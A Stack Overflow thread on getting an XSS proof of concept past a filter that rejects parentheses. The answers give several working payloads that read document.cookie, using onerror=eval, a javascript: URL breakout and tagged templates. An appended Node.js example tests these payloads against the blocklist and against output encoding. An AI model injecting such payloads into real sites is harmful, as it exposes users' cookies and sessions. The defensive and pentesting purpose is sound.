I have found a Cross Site Scripting vulnerability in a client's application. The problem is that the vulnerable parameter does not accept parentheses. So something like alert(document.cookie)
will be rejected because of the parentheses. I can get XSS using alert `xss`
but my client requires proof of being able to access the DOM.
In other words, how can I alert(document.cookie)
without parentheses? Are there any alternatives?
Thanks!
asked Nov 30, 2016 at 21:33 by user00239123
Comments:
- There are no alternatives for a method call. However, through the careful application of an implicit eval there is no need for parentheses to appear in the source code, and not all code requires parentheses to do 'interesting' things. I'm not sure how the conclusion relates to XSS though. – user2864740, Nov 30, 2016 at 21:38
- The XSS Filter Evasion Cheat Sheet includes a number of techniques, including ones that avoid parentheses (certain conditions apply). – Ouroborus, Nov 30, 2016 at 21:47
3 Answers
document.body.innerHTML=document.cookie
will display the cookies on the page itself.
Speaking of the XSS vulnerability: Yes, it is vulnerable and disabling parentheses will just force attackers to use more creative methods. Letting someone execute any arbitrary code is a liability.
Here's a simple example of how you can call any function with any parameters without using any parentheses in your input:
<p>Malicious input: window.onerror=eval;throw '=1;alert\u0028document.location\u0029'</p>
<input type="button" onclick="window.onerror=eval;throw '=1;alert\u0028document.location\u0029'" value="Click me">
This is another solution that worked for me:
<script>
var firstname = 'aa';document.location='javascript:alert%28document.cookie%29';//';
</script>
The payload would be:
?vulnparam=aa';document.location='javascript:alert%2528document.cookie%2529';//
@tcooc's answer is also working.
This also works without using =:
<script>Function`X${alert`${document.cookie}`}```</script>
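The thread's payloads make one defensive point clear: rejecting parentheses is a blocklist, and the answers above route around it in four different ways. The following is an added example, not code from the question or from any of the answerers, that runs those same payloads through the parentheses check and then through context-aware output encoding for the two sinks the answers use (a single-quoted JavaScript string literal, as in the `var firstname = '...'` answer, and HTML text or attribute content, as in the innerHTML and onclick answers). The function names and the character allowlist are my own choices, and the script assumes Node.js.

```javascript
// Added example (not from the Stack Overflow thread): contrasts the
// parentheses blocklist described in the question with context-aware output
// encoding, using the thread's own payloads as constructed test input.
// Runs under Node.js with no dependencies.

// Constructed test inputs: the payloads quoted in the question and answers.
const PAYLOADS = [
  "alert(document.cookie)",                                      // the only one the blocklist stops
  "document.body.innerHTML=document.cookie",
  "window.onerror=eval;throw '=1;alert\\u0028document.location\\u0029'",
  "aa';document.location='javascript:alert%2528document.cookie%2529';//",
  "Function`X${alert`${document.cookie}`}```",
];

// The filter the question describes: reject any value containing '(' or ')'.
// Returns true when the value would be accepted.
function parenthesesBlocklist(value) {
  return !/[()]/.test(value);
}

// How many of the given values the blocklist lets through.
function countAcceptedByBlocklist(values) {
  return values.filter(parenthesesBlocklist).length;
}

// Fix for the `var firstname = '<value>';` context: every character outside a
// small allowlist (assumed here: letters, digits, comma, period, underscore,
// space) becomes a \uXXXX escape, so nothing can close the string literal,
// start a template literal, or end the enclosing <script> element.
function encodeForJsString(value) {
  return String(value).replace(/[^a-zA-Z0-9,._ ]/g, (ch) =>
    "\\u" + ch.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Fix for the HTML text / attribute context (the innerHTML and onclick examples):
// entity-encode the characters that can break out of text or a quoted attribute.
function encodeForHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "`": "&#x60;" };
  return String(value).replace(/[&<>"'`]/g, (ch) => map[ch]);
}

// The script line from the third answer, rendered with the encoder applied.
function renderScript(value) {
  return "var firstname = '" + encodeForJsString(value) + "';";
}

// Check that an encoded JS string value (a) contains only allowlisted characters
// and \uXXXX escapes and (b) decodes back to the original data. JSON.parse is
// used as an eval-free decoder: its \uXXXX escapes have the same meaning as JS's.
function jsEncodingIsSound(value) {
  const encoded = encodeForJsString(value);
  const onlySafeChars = /^(?:[a-zA-Z0-9,._ ]|\\u[0-9a-f]{4})*$/.test(encoded);
  return onlySafeChars && JSON.parse('"' + encoded + '"') === value;
}

// True when every value is neutralised in both contexts: the JS encoding is
// sound and the HTML encoding leaves no quote, backtick or angle bracket.
function allPayloadsNeutralised(values) {
  return values.every((v) =>
    jsEncodingIsSound(v) && !/[<>"'`]/.test(encodeForHtml(v)));
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("accepted by blocklist:", countAcceptedByBlocklist(PAYLOADS), "of", PAYLOADS.length);
  console.log(renderScript(PAYLOADS[3]));
  console.log("all payloads neutralised:", allPayloadsNeutralised(PAYLOADS));
}
```

Running it shows the blocklist passing four of the five payloads while the encoders neutralise all five, which is the practical takeaway from the thread: the fix for the client's parameter is encoding for the context the value lands in, not a longer list of forbidden characters. The allowlist in encodeForJsString is deliberately narrow; widening it is safe only for characters that have no meaning inside a JavaScript string literal or a `<script>` element.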
javascript - parentheses alternatives in JS, if any? - Stack Overflow